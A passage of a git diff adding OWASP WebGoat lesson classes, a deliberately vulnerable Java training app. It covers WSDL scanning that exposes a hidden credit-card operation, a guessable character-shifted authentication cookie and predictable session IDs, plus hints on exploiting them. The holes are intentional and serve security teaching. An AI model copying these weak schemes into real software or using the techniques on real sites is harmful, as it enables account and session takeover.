+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.util.ArrayList;
+import java.util.List;
+
+import javax.xml.namespace.QName;
+import javax.xml.rpc.ParameterMode;
+import javax.xml.rpc.ServiceException;
+
+import org.apache.axis.client.Call;
+import org.apache.axis.client.Service;
+import org.apache.axis.encoding.XMLType;
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.Option;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.Select;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.WebgoatContext;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author asmolen
+ *
+ * TODO To change the template for this generated type comment go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+public class WSDLScanning extends LessonAdapter
+{
+
+    static boolean completed = false;
+
+    static boolean beenRestartedYet = false;
+
+    public final static String firstName = "getFirstName";
+
+    public final static String lastName = "getLastName";
+
+    public final static String loginCount = "getLoginCount";
+
+    public final static String ccNumber = "getCreditCard";
+
+    final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg")
+	    .setAlt("Parasoft").setBorder(0).setHspace(0).setVspace(0);
+
+	private static WebgoatContext webgoatContext;
+	
+	/**
+	 * We maintain a static reference to WebgoatContext, since this class
+	 * is also automatically instantiated by the Axis web services module,
+	 * which does not call setWebgoatContext()
+	 * (non-Javadoc)
+	 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
+	 */
+	@Override
+	public void setWebgoatContext(WebgoatContext webgoatContext) {
+		WSDLScanning.webgoatContext = webgoatContext;
+	}
+	
+	@Override
+	public WebgoatContext getWebgoatContext() {
+		return WSDLScanning.webgoatContext;
+	}
+
+    protected Category getDefaultCategory()
+    {
+	return Category.WEB_SERVICES;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("Try connecting to the WSDL with a browser or Web Service tool.");
+	hints
+		.add("Sometimes the WSDL will define methods that are not available through a web API. "
+			+ "Try to find operations that are in the WSDL, but not part of this API");
+	hints
+		.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
+			+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
+	hints
+		.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(120);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    public String getTitle()
+    {
+	return "WSDL Scanning";
+    }
+
+
+    public Object accessWGService(String serv, int port, String proc,
+	    String parameterName, Object parameterValue)
+    {
+	String targetNamespace = "WebGoat";
+	try
+	{
+	    QName serviceName = new QName(targetNamespace, serv);
+	    QName operationName = new QName(targetNamespace, proc);
+	    Service service = new Service();
+	    Call call = (Call) service.createCall();
+	    call.setOperationName(operationName);
+	    call.addParameter(parameterName, serviceName, ParameterMode.INOUT);
+	    call.setReturnType(XMLType.XSD_STRING);
+	    call.setUsername("guest");
+	    call.setPassword("guest");
+	    call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/"
+		    + serv);
+	    Object result = call.invoke(new Object[] { parameterValue });
+	    return result;
+	}
+	catch (RemoteException e)
+	{
+	    e.printStackTrace();
+	}
+	catch (ServiceException e)
+	{
+	    e.printStackTrace();
+	}
+	catch (Exception e)
+	{
+	    e.printStackTrace();
+	}
+	return null;
+    }
+
+
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+	if (s.isColor())
+	{
+	    t1.setBorder(1);
+	}
+	TR tr = new TR();
+	tr.addElement(new TD("Enter your account number: "));
+	tr.addElement(new TD(new Input(Input.TEXT, "id", "101")));
+	t1.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD("Select the fields to return: "));
+	tr.addElement(new TD(new Select("field").setMultiple(true).addElement(
+		new Option(firstName).addElement("First Name")).addElement(
+		new Option(lastName).addElement("Last Name")).addElement(
+		new Option(loginCount).addElement("Login Count"))));
+	t1.addElement(tr);
+
+	tr = new TR();
+	Element b = ECSFactory.makeButton("Submit");
+	tr.addElement(new TD(b).setAlign("CENTER").setColSpan(2));
+	t1.addElement(tr);
+
+	ec.addElement(t1);
+
+	try
+	{
+	    String[] fields = s.getParser().getParameterValues("field");
+	    int id = s.getParser().getIntParameter("id");
+
+	    Table t = new Table().setCellSpacing(0).setCellPadding(2)
+		    .setBorder(1);
+
+	    if (s.isColor())
+	    {
+		t.setBorder(1);
+	    }
+	    TR header = new TR();
+	    TR results = new TR();
+	    int port = s.getRequest().getServerPort();
+	    for (int i = 0; i < fields.length; i++)
+	    {
+		header.addElement(new TD().addElement(fields[i]));
+		results.addElement(new TD()
+			.addElement((String) accessWGService("WSDLScanning", port,
+				fields[i], "acct_num", new Integer(id))));
+	    }
+	    if (fields.length == 0)
+	    {
+		s.setMessage("Please select a value to return.");
+	    }
+	    t.addElement(header);
+	    t.addElement(results);
+	    ec.addElement(new P().addElement(t));
+	}
+	catch (Exception e)
+	{
+
+	}
+	try
+	{
+	    A a = new A("services/WSDLScanning?WSDL", "WebGoat WSDL File");
+	    ec
+		    .addElement(new P()
+			    .addElement("View the web services definition language (WSDL) to see the complete API:"));
+	    ec.addElement(new BR());
+	    ec.addElement(a);
+	    //getLessonTracker( s ).setCompleted( completed );
+
+	    if (completed && !getLessonTracker(s).getCompleted()
+		    && !beenRestartedYet)
+	    {
+		makeSuccess(s);
+		beenRestartedYet = true;
+	    }
+	    else if (completed && !getLessonTracker(s).getCompleted()
+		    && beenRestartedYet)
+	    {
+		completed = false;
+		beenRestartedYet = false;
+	    }
+
+	    //            accessWGService("WSDLScanning", "getCreditCard", "acct_num", new Integer(101));
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+
+    public String getResults(int id, String field)
+    {
+	try
+	{
+	    Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
+	    PreparedStatement ps = connection
+		    .prepareStatement("SELECT * FROM user_data WHERE userid = ?");
+	    ps.setInt(1, id);
+	    try
+	    {
+		ResultSet results = ps.executeQuery();
+		if ((results != null) && (results.next() == true))
+		{
+		    return results.getString(field);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {}
+	}
+	catch (Exception e)
+	{}
+	return null;
+    }
+
+
+    public String getCreditCard(int id)
+    {
+	String result = getResults(id, "cc_number");
+	if (result != null)
+	{
+	    completed = true;
+	    return result;
+	}
+	return null;
+    }
+
+
+    public String getFirstName(int id)
+    {
+	String result = getResults(id, "first_name");
+	if (result != null)
+	{
+	    return result;
+	}
+	return null;
+    }
+
+
+    public String getLastName(int id)
+    {
+	String result = getResults(id, "last_name");
+	if (result != null)
+	{
+	    return result;
+	}
+	return null;
+    }
+
+
+    public String getLoginCount(int id)
+    {
+	String result = getResults(id, "login_count");
+	if (result != null)
+	{
+	    return result;
+	}
+	return null;
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO);
+    }
+
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java
new file mode 100644
index 000000000..8ca10731a
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java
@@ -0,0 +1,383 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+import javax.servlet.http.Cookie;
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.*;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
+ */
+public class WeakAuthenticationCookie extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(
+			new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String AUTHCOOKIE = "AuthCookie";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String LOGOUT = "WACLogout";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PASSWORD = "Password";
+
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USERNAME = "Username";
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected String checkCookie(WebSession s) throws Exception
+	{
+		String cookie = getCookie(s);
+
+		if (cookie != null)
+		{
+			if (cookie.equals(encode("webgoat12345")))
+			{
+				return ("webgoat");
+			}
+
+			if (cookie.equals(encode("aspect12345")))
+			{
+				return ("aspect");
+			}
+
+			if (cookie.equals(encode("alice12345")))
+			{
+				makeSuccess(s);
+				return ("alice");
+			} else
+			{
+				s.setMessage("Invalid cookie");
+				s.eatCookies();
+			}
+		}
+
+		return (null);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected String checkParams(WebSession s) throws Exception
+	{
+		String username = s.getParser().getStringParameter(USERNAME, "");
+		String password = s.getParser().getStringParameter(PASSWORD, "");
+
+		if ((username.length() > 0) && (password.length() > 0))
+		{
+			String loginID = "";
+
+			if (username.equals("webgoat") && password.equals("webgoat"))
+			{
+				loginID = encode("webgoat12345");
+			} else if (username.equals("aspect") && password.equals("aspect"))
+			{
+				loginID = encode("aspect12345");
+			}
+
+			if (loginID != "")
+			{
+				Cookie newCookie = new Cookie(AUTHCOOKIE, loginID);
+				s.setMessage("Your identity has been remembered");
+				s.getResponse().addCookie(newCookie);
+
+				return (username);
+			} else
+			{
+				s.setMessage("Invalid username and password entered.");
+			}
+		}
+
+		return (null);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		boolean logout = s.getParser().getBooleanParameter(LOGOUT, false);
+
+		if (logout)
+		{
+			s.setMessage("Goodbye!  Your password has been forgotten");
+			s.eatCookies();
+
+			return (makeLogin(s));
+		}
+
+		try
+		{
+			String user = checkCookie(s);
+
+			if ((user != null) && (user.length() > 0))
+			{
+				return (makeUser(s, user, "COOKIE"));
+			}
+
+			user = checkParams(s);
+
+			if ((user != null) && (user.length() > 0))
+			{
+				return (makeUser(s, user, "PARAMETERS"));
+			}
+		}
+		catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (makeLogin(s));
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private String encode(String value)
+	{
+		// <START_OMIT_SOURCE>
+		StringBuffer encoded = new StringBuffer();
+
+		for (int i = 0; i < value.length(); i++)
+		{
+			encoded.append(String.valueOf((char) (value.charAt(i) + 1)));
+		}
+
+		return encoded.reverse().toString();
+		// <END_OMIT_SOURCE>
+	}
+
+	/**
+	 * Gets the category attribute of the WeakAuthenticationCookie object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.SESSION_MANAGEMENT;
+	}
+
+	/**
+	 * Gets the cookie attribute of the CookieScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return The cookie value
+	 */
+	protected String getCookie(WebSession s)
+	{
+		Cookie[] cookies = s.getRequest().getCookies();
+
+		for (int i = 0; i < cookies.length; i++)
+		{
+			if (cookies[i].getName().equalsIgnoreCase(AUTHCOOKIE))
+			{
+				return (cookies[i].getValue());
+			}
+		}
+
+		return (null);
+	}
+
+	/**
+	 * Gets the hints attribute of the CookieScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("The server authenticates the user using a cookie, if you send the right cookie.");
+		hints.add("Is the AuthCookie value guessable knowing the username and password?");
+		hints.add("Add 'AuthCookie=********;' to the Cookie: header using "
+				+ "<A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A>.");
+		hints.add("After logging in as webgoat a cookie is added. 65432ubphcfx<br/>" +
+				  "After logging in as aspect a cookie is added. 65432udfqtb<br/>" +
+				  "Is there anything similar about the cookies and the login names?");
+		return hints;
+	}
+
+	/**
+	 * Gets the instructions attribute of the WeakAuthenticationCookie object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.";
+
+		return (instructions);
+	}
+
+	private final static Integer DEFAULT_RANKING = new Integer(90);
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the CookieScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Spoof an Authentication Cookie");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeLogin(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(new H1().addElement("Sign In "));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+
+		TR tr = new TR();
+		tr.addElement(new TH().addElement(
+				"Please sign in to your account.  See the OWASP admin if you do not have an account.").setColSpan(2)
+				.setAlign("left"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+		t.addElement(tr);
+
+		TR row1 = new TR();
+		TR row2 = new TR();
+		row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+		row2.addElement(new TD(new B(new StringElement("*Password: "))));
+
+		Input input1 = new Input(Input.TEXT, USERNAME, "");
+		Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+		row1.addElement(new TD(input1));
+		row2.addElement(new TD(input2));
+		t.addElement(row1);
+		t.addElement(row2);
+
+		Element b = ECSFactory.makeButton("Login");
+		t.addElement(new TR(new TD(b)));
+		ec.addElement(t);
+
+		return (ec);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param user
+	 *            Description of the Parameter
+	 * @param method
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception Exception
+	 *                Description of the Exception
+	 */
+	protected Element makeUser(WebSession s, String user, String method) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new P().addElement("Welcome, " + user));
+		ec.addElement(new P().addElement("You have been authenticated with " + method));
+		ec.addElement(new P().addElement(ECSFactory.makeLink("Logout", LOGOUT, true)));
+		ec.addElement(new P().addElement(ECSFactory.makeLink("Refresh", "", "")));
+
+		return (ec);
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java
new file mode 100644
index 000000000..b331e3bed
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java
@@ -0,0 +1,275 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import javax.servlet.http.Cookie;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Rogan Dawes <a href="http://dawes.za.net/rogan">Rogan Dawes</a>
+ * @created    March 30, 2005
+ */
+public class WeakSessionID extends LessonAdapter
+{
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+    /**
+     *  Description of the Field
+     */
+    protected final static String SESSIONID = "WEAKID";
+
+    /**
+     *  Description of the Field
+     */
+    protected final static String PASSWORD = "Password";
+
+    /**
+     *  Description of the Field
+     */
+    protected final static String USERNAME = "Username";
+
+    protected static List<String> sessionList = new ArrayList<String>();
+
+    protected static long seq = Math.round(Math.random() * 10240) + 10000;
+
+    protected static long lastTime = System.currentTimeMillis();
+
+
+    /**
+     *  Gets the credits attribute of the AbstractLesson object
+     *
+     * @return    The credits value
+     */
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("By Rogan Dawes of ", ASPECT_LOGO);
+    }
+
+
+    protected String newCookie(WebSession s)
+    {
+	long now = System.currentTimeMillis();
+	seq++;
+	if (seq % 29 == 0)
+	{
+	    String target = encode(seq++, lastTime + (now - lastTime) / 2);
+	    sessionList.add(target);
+	    s.setMessage(target);
+	    if (sessionList.size() > 100)
+		sessionList.remove(0);
+	}
+	lastTime = now;
+	return encode(seq, now);
+    }
+
+
+    private String encode(long seq, long time)
+    {
+	return new String(Long.toString(seq) + "-" + Long.toString(time));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	try
+	{
+	    String sessionid = s.getCookie(SESSIONID);
+	    if (sessionid != null && sessionList.indexOf(sessionid) > -1)
+	    {
+		return makeSuccess(s);
+	    }
+	    else
+	    {
+		return makeLogin(s);
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (null);
+    }
+
+
+    /**
+     *  Gets the category attribute of the WeakAuthenticationCookie object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.SESSION_MANAGEMENT;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the CookieScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints.add("The server skips authentication if you send the right cookie.");
+	hints.add("Is the cookie value predictable? Can you see gaps where someone else has acquired a cookie?");
+	hints.add("Try harder, you brute!");
+	hints.add("The first part of the cookie is a sequential number, the second part is milliseconds.");
+	hints.add("After the 29th try, the skipped identifier is printed to your screen. Use that to login.");
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(90);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CookieScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Hijack a Session");
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element makeLogin(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	String weakid = s.getCookie(SESSIONID);
+
+	if (weakid == null)
+	{
+	    weakid = newCookie(s);
+	    Cookie cookie = new Cookie(SESSIONID, weakid);
+	    s.getResponse().addCookie(cookie);
+	}
+
+	ec.addElement(new H1().addElement("Sign In "));
+	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		.setWidth("90%").setAlign("center");
+
+	if (s.isColor())
+	{
+	    t.setBorder(1);
+	}
+
+	String username = null;
+	String password = null;
+
+	try
+	{
+	    username = s.getParser().getStringParameter(USERNAME);
+	}
+	catch (ParameterNotFoundException pnfe)
+	{}
+	try
+	{
+	    password = s.getParser().getStringParameter(PASSWORD);
+	}
+	catch (ParameterNotFoundException pnfe)
+	{}
+
+	if (username != null || password != null)
+	{
+	    s.setMessage("Invalid username or password.");
+	}
+
+	TR tr = new TR();
+	tr.addElement(new TH().addElement("Please sign in to your account.")
+		.setColSpan(2).setAlign("left"));
+	t.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
+	t.addElement(tr);
+
+	tr = new TR();
+	tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+	t.addElement(tr);
+
+	TR row1 = new TR();
+	TR row2 = new TR();
+	row1.addElement(new TD(new B(new StringElement("*User Name: "))));
+	row2.addElement(new TD(new B(new StringElement("*Password: "))));
+
+	Input input1 = new Input(Input.TEXT, USERNAME, "");
+	Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+	Input input3 = new Input(Input.HIDDEN, SESSIONID, weakid);
+	row1.addElement(new TD(input1));
+	row2.addElement(new TD(input2));
+	t.addElement(row1);
+	t.addElement(row2);
+	t.addElement(input3);
+
+	Element b = ECSFactory.makeButton("Login");
+	t.addElement(new TR(new TD(b)));
+	ec.addElement(t);
+
+	return (ec);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java
new file mode 100644
index 000000000..4885c029e
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java
@@ -0,0 +1,163 @@
+package org.owasp.webgoat.lessons;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.HtmlColor;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Center;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.*;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    October 28, 2003
+ */
+public class WelcomeScreen extends Screen
+{
+
+    /**
+     *  Constructor for the WelcomeScreen object
+     *
+     * @param  s  Description of the Parameter
+     */
+    public WelcomeScreen(WebSession s)
+    {
+	setup(s);
+    }
+
+
+    /**
+     *  Constructor for the WelcomeScreen object
+     */
+    public WelcomeScreen()
+    {}
+
+
+    public void setup(WebSession s)
+    {
+	// call createContent first so messages will go somewhere
+
+	Form form = new Form("attack", Form.POST).setName("form")
+		.setEncType("");
+
+	form.addElement(wrapForm(s));
+
+	TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign(
+		"left").addElement(form);
+	TR row = new TR().addElement(lowerright);
+	Table layout = new Table().setBgColor(HtmlColor.WHITE)
+		.setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+	layout.addElement(row);
+
+	setContent(layout);
+    }
+
+
+    protected Element wrapForm(WebSession s)
+    {
+	if (s == null)
+	{
+	    return new StringElement("Invalid Session");
+	}
+
+	Table container = new Table().setWidth("100%").setCellSpacing(10)
+		.setCellPadding(0).setBorder(0);
+
+	// CreateContent can generate error messages so you MUST call it before makeMessages()
+	Element content = createContent(s);
+	container.addElement(new TR().addElement(new TD().setColSpan(2)
+		.setVAlign("TOP").addElement(makeMessages(s))));
+	container.addElement(new TR().addElement(new TD().setColSpan(2)
+		.addElement(content)));
+	container.addElement(new TR());
+
+	return (container);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	Element b = ECSFactory.makeButton("Start the Course!");
+	ec.addElement(new Center(b));
+
+	return (ec);
+    }
+
+
+    public Element getCredits()
+    {
+	return new ElementContainer();
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the WelcomeScreen object
+     *
+     * @return    The instructions value
+     */
+    protected String getInstructions()
+    {
+	String instructions = "Enter your name and learn how HTTP really works!";
+
+	return (instructions);
+    }
+
+
+    /**
+     *  Gets the title attribute of the WelcomeScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Welcome to the Penetration Testing Course");
+    }
+
+
+    /* (non-Javadoc)
+     * @see session.Screen#getRole()
+     */
+    public String getRole()
+    {
+	return AbstractLesson.USER_ROLE;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java
new file mode 100644
index 000000000..ef022bd75
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java
@@ -0,0 +1,263 @@
+/*
+ * Created on Jun 1, 2005
+ *
+ * TODO To change the template for this generated file go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+package org.owasp.webgoat.lessons;
+
+import java.io.IOException;
+import java.io.StringReader;
